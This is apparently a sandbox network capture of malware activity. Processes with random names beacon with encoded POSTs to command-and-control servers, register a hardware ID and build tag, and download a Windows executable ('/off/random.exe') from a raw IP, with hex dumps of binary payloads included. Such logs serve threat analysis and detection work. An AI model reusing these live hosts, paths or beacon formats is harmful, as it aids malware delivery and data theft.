Dec 8, 2024 19:53:54.004426003 CET	1236	IN	Data Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY\|#l)\DItv
Dec 8, 2024 19:53:54.004436970 CET	1236	IN	Data Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c Data Ascii: N^VW3DNF\|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
Dec 8, 2024 19:53:54.004457951 CET	1236	IN	Data Raw: 00 5f 5e 5b c9 c2 08 00 49 eb 89 41 eb 86 8d 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7 Data Ascii: _^[IAG[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3
Dec 8, 2024 19:53:54.004470110 CET	1236	IN	Data Raw: 00 83 f8 12 0f 8d e0 04 04 00 83 e8 04 83 f8 0a 77 94 ff 24 85 85 27 40 00 6a 7f 58 66 3b d8 0f 84 c2 06 04 00 8b 19 33 c0 66 85 c0 74 1c 8b 45 90 40 89 45 90 8b 1c 81 0f b7 43 08 66 3b 85 50 ff ff ff 75 e4 e9 9d 06 04 00 83 3b 05 75 df 8b 04 91 Data Ascii: w$'@jXf;3ftE@ECf;Pu;u3f9X'ULUf9Y]79^99L99!:9#, rU]
Dec 8, 2024 19:53:54.004694939 CET	1236	IN	Data Raw: 85 79 02 04 00 38 5f 08 75 1c 8b 47 04 6a 08 50 8b 70 04 e8 c8 d5 01 00 59 59 89 77 04 88 5f 09 ff 0f 5f 5e 5b c3 b3 01 eb f3 55 8b ec 56 8b f1 80 7e 09 00 0f 85 5f 02 04 00 6a 08 e8 ad d5 01 00 59 8b 4d 08 8b 09 89 08 8b 4e 04 89 48 04 89 46 04 Data Ascii: y8_uGjPpYYw__^[UV~_jYMNHF^]UQSV3W8^?8^u7~G0EtO ,O$j8WIEYYF^_^[UWVj8)YuON0w^_]UVuWO
Dec 8, 2024 19:53:54.004705906 CET	1236	IN	Data Raw: a3 88 13 4d 00 ff d6 57 ff 35 8c 13 4d 00 ff d6 5f 5e c3 55 8b ec 83 ec 40 a1 58 13 4d 00 56 33 f6 a3 04 19 4d 00 6a 0f c7 45 c4 30 00 00 00 c7 45 c8 2b 00 00 00 89 75 d0 c7 45 d4 1e 00 00 00 89 45 d8 89 75 e0 ff 15 3c c7 49 00 89 45 e4 8b 45 10 Data Ascii: MW5M_^U@XMV3MjE0E+uEEu<IEEEEEEPuEIE}A0IhIfM IMEPEE;Ijjj!jjIh5M\M4IPj5\MI5`M^UVW
Dec 8, 2024 19:53:54.004715919 CET	1236	IN	Data Raw: cc 00 00 00 2d 8f 00 00 00 0f 84 d8 fc 03 00 48 83 e8 01 0f 84 ba fc 03 00 2d ff 01 00 00 0f 84 94 fc 03 00 2d ef 00 00 00 0f 84 8f 00 00 00 3b 3d 28 25 4d 00 0f 84 58 fc 03 00 ff 75 0c ff 75 08 57 56 ff 15 08 c7 49 00 5f 5e 5b 8b e5 5d c3 85 c0 Data Ascii: -H--;=(%MXuuWVI_^[]tt%jVIM73jhjV$IhI I=M(%MuIMuQQVMjIU<SVWj,EE0jP
Dec 8, 2024 19:53:54.004726887 CET	1236	IN	Data Raw: 4d 00 ff 53 56 57 33 db c7 05 94 19 4d 00 01 01 01 01 68 58 cb 49 00 89 1d 90 19 4d 00 66 89 1d 98 19 4d 00 c6 05 9a 19 4d 00 01 c7 05 9c 19 4d 00 09 00 00 00 89 1d a8 19 4d 00 e8 0a 66 00 00 68 3c cb 49 00 b9 bc 19 4d 00 e8 fb 65 00 00 b9 cc 19 Data Ascii: MSVW3MhXIMfMMMMfh<IMeMrMrMrM4MMMMMMMMj_MMMMMMMMM M$M0Mrud
Dec 8, 2024 19:53:54.124541044 CET	1236	IN	Data Raw: 53 52 51 ff 15 18 c0 49 00 85 c0 75 4f 8b 45 0c 57 8d 3c 00 8d 45 fc 89 7d fc 50 56 53 53 ff 75 08 ff 75 f8 ff 15 20 c0 49 00 85 c0 75 15 8b 45 fc d1 e8 89 45 fc 3b 45 0c 73 18 33 c9 66 89 0c 46 b3 01 ff 75 f8 ff 15 1c c0 49 00 8a c3 5f 5e 5b c9 Data Ascii: SRQIuOEW<E}PVSSuu IuEE;Es3fFuI_^[3fD72V\|M]8MW3=MZ=@M M@I95(Mv"$Mj4$MYY<F;5(Mr5$M=(MYMM<I5M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49905	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:52.884227037 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:53:53.238481998 CET	1072	OUT	Data Raw: 54 52 46 5e 5a 5e 50 52 5c 5e 5b 53 52 55 50 5a 56 5c 54 59 50 55 54 49 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: TRF^Z^PR\^[SRUPZV\TYPUTISVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX&<5') !5<? !)(_2/7_'7#(7[,?/<!%'F.#]-
Dec 8, 2024 19:53:54.228523970 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:54.461683989 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 5b 40 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 40[@V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49913	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:54.728813887 CET	387	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue
Dec 8, 2024 19:53:55.082285881 CET	1072	OUT	Data Raw: 54 59 43 5f 5f 59 50 57 5c 5e 5b 53 52 59 50 5c 56 59 54 5e 50 55 54 48 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: TYC__YPW\^[SRYP\VYT^PUTHSVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX%(!$+X 68]+]#9 &/^0'/((-/$@<7Z%'F.#]-2
Dec 8, 2024 19:53:56.052781105 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:56.285075903 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 5b 40 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 40[@V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49919	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:56.701216936 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:53:57.053953886 CET	1072	OUT	Data Raw: 54 5e 46 58 5f 5d 55 54 5c 5e 5b 53 52 58 50 50 56 5c 54 5e 50 5e 54 46 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: T^FX_]UT\^[SRXPPV\T^P^TFSVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX%?]0_;Z6;)? !) 1<'_%4;?X3].<4(2+\%<'F.#]-6
Dec 8, 2024 19:53:58.037890911 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:58.269223928 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 5b 40 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 40[@V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49921	185.215.113.206	80	7704	C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:57.444869995 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 8, 2024 19:53:58.787870884 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 19:53:58.838793039 CET	412	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECFHDBAAECAAKFHDHII Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 36 36 42 33 32 30 39 44 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 49 2d 2d 0d 0a Data Ascii: ------IECFHDBAAECAAKFHDHIIContent-Disposition: form-data; name="hwid"3266B3209D0F807656615------IECFHDBAAECAAKFHDHIIContent-Disposition: form-data; name="build"stok------IECFHDBAAECAAKFHDHII--
Dec 8, 2024 19:53:59.288018942 CET	210	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49922	185.215.113.43	80	7716	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:58.439563036 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 32 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013251001&unit=246122658369
Dec 8, 2024 19:53:59.937725067 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 18:53:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49927	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:58.518238068 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:53:58.876786947 CET	1072	OUT	Data Raw: 54 5d 43 52 5a 5c 55 55 5c 5e 5b 53 52 58 50 5a 56 58 54 5d 50 58 54 40 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: T]CRZ\UU\^[SRXPZVXT]PXT@SVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX&]?%':8!8^<,8X#:32/+X''$T<(9'=!41'F.#]-6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49930	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:59.165862083 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:53:59.519490957 CET	1788	OUT	Data Raw: 54 52 43 53 5a 5e 50 54 5c 5e 5b 53 52 5a 50 51 56 5f 54 58 50 5d 54 43 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: TRCSZ^PT\^[SRZPQV_TXP]TCSVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX%?)&:+^!5<)?/!:<[2'^'40W+\.,+??1<'F.#]->
Dec 8, 2024 19:54:00.808837891 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:54:01.045377970 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:54:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 02 13 39 13 22 05 02 0c 21 2a 3d 1a 2f 28 04 58 28 07 3d 02 2c 38 00 08 2b 0d 34 01 2a 2c 38 58 3e 2d 2f 00 30 33 22 19 36 0b 37 51 26 34 20 5b 0d 1e 24 08 23 0a 37 11 2b 0d 36 07 2c 19 04 5b 24 3f 22 5a 22 14 24 0c 30 38 2a 06 28 31 3d 50 2b 23 06 51 27 3a 20 5a 27 03 24 04 3c 2b 21 57 0c 11 21 1e 25 20 0e 1d 22 21 20 11 26 22 23 56 23 26 22 1b 2a 0a 31 03 24 06 38 04 2c 28 13 5d 36 22 30 1e 2e 2b 3a 17 35 13 0a 08 2b 29 2e 52 23 01 2e 52 00 3f 5b 4f 0d 0a 30 0d 0a 0d 0a Data Ascii: 989"!=/(X(=,8+4,8X>-/03"67Q&4 [$#7+6,[$?"Z"$08(1=P+#Q': Z'$<+!W!% "! &"#V#&"1$8,(]6"0.+:5+).R#.R?[O0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49931	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:59.295433998 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:53:59.645018101 CET	1072	OUT	Data Raw: 54 58 43 5a 5a 5b 55 53 5c 5e 5b 53 52 5f 50 5e 56 53 54 59 50 5d 54 47 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: TXCZZ[US\^[SR_P^VSTYP]TGSVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX%<<346S Z+Y,#%</' (,9? A?2#X%'F.#]-
Dec 8, 2024 19:54:00.925318956 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:54:01.157430887 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:54:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 5b 40 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 40[@V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49936	185.215.113.16	80	7716	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:54:00.062412024 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 8, 2024 19:54:01.493942022 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 18:54:01 GMT Content-Type: application/octet-stream Content-Length: 2836992 Last-Modified: Sun, 08 Dec 2024 18:42:09 GMT Connection: keep-alive ETag: "6755e881-2b4a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 bd c6 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ ,+`Ui` @ @.rsrc`2@.idata 8@cvbdjiir+*:@klvbmdih +"+@.taggant@+"(+@
Dec 8, 2024 19:54:01.493988037 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:54:01.494000912 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:54:01.494112015 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:54:01.494122982 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:54:01.494133949 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:54:01.494147062 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:54:01.494293928 CET	1236	IN	Data Raw: f6 f7 c3 db ae 1a fc 16 16 2b c2 9e 21 71 a7 c8 f5 5e 59 fb b4 3c ae 38 7a e1 88 19 dc 5c 38 e6 49 73 16 77 d0 02 79 bb f9 aa 80 c6 c0 38 cc 1b 05 e0 9c c8 58 ed cf 1c 17 c2 c1 02 07 e8 0b e5 00 f5 ec d8 ae ee f0 a0 4a d1 e3 06 25 db c1 6b 68 92 Data Ascii: +!q^Y<8z\8Iswy8XJ%khB)0"$0,~RMA",R.g7D<fN&ig}q/w5 _\K[zrp;}%a^`^S
Dec 8, 2024 19:54:01.494306087 CET	1224	IN	Data Raw: 9a f6 ea a6 e2 f6 e6 fa f5 8b 63 c1 2f d3 e8 49 54 cb ec c2 a6 3c 8e f9 64 6e 86 d6 02 33 f6 db 54 cb b6 f8 f6 13 b2 d5 fd fc 70 59 02 f6 aa d8 54 17 ea 8e a6 2f 5a c7 b0 5a 4c 9d 6a d3 4e e0 a4 d2 16 7d 2f 77 ff 50 02 73 9e db 94 e2 76 69 9c bb Data Ascii: c/IT<dn3TpYT/ZZLjN}/wPsviofFLOH G^vyR.$n&T2.//}&w\|~mtUvAL$@Df*$eZ3Mw@\|sH3Q&G/<pt8=<
Dec 8, 2024 19:54:01.494322062 CET	1236	IN	Data Raw: 4d 5e 9a d5 66 35 17 a7 f6 cf 38 95 4d d5 f3 d1 b8 3b ea e5 41 0e 3a db 19 8f fa 47 13 fc e4 8e 52 e6 86 31 2e 19 b9 b9 b3 9b 50 37 48 ce b8 8b 10 7a 84 17 84 18 d7 e4 74 dd b7 21 44 f3 56 ab 22 0c 7b b5 04 83 48 b5 b7 1c 5a 7c 9c e6 5e c8 06 18 Data Ascii: M^f58M;A:GR1.P7Hzt!DV"{HZ\|^Fj{:Z8vjF0?WN1e\|ALlAB4fOoo!\|>9)"nAjCUcQk
Dec 8, 2024 19:54:01.613440990 CET	1236	IN	Data Raw: a4 5b 35 f5 23 f3 cf ad 28 89 6a 0c 2a 2e 23 0d 7c df c9 e2 70 5b c7 17 c8 ff 84 fb 20 e6 f8 9b 20 df aa ee 27 c5 de b1 2d ee dd ca 20 ef a0 ac 57 e2 14 24 a1 9a ce 80 43 ac e8 49 55 b1 53 d6 4d 0d e2 1e 55 fd f4 a7 4a 22 5e af 3a 10 5c d4 b0 1c Data Ascii: [5#(j.#\|p[ '- W$CIUSMUJ"^:\+Y!:u&j(N!Xre=\|u=\|^ae>.,:]2t/z.(YOLi#:\@Q41^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49943	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
